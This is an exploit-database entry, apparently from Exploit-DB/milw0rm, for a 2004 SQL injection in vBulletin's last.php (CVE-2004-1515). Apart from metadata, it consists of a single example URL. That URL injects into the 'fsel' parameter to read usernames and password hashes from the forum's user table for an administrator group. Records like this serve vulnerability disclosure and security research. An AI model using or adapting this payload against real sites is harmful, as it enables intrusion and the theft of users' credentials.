[] NeoSense

vBulletin - 'LAST.php' SQL Injection

Author: anonymous
type: webapps
platform: php
port: 
date_added: 2004-11-14 
date_updated:  
verified: 1 
codes: OSVDB-11701;CVE-2004-1515 
tags: 
aliases:  
screenshot_url:  
application_url: 

Example:

http://www.example.com/last.php?fsel=,user.password%20as%20title,user.%20%20%20%20username%20as%20lastposter%20FROM%20user,thread%20%20%20%20%20WHERE%20usergroupid=6%20LIMIT%201

# milw0rm.com [2004-11-15]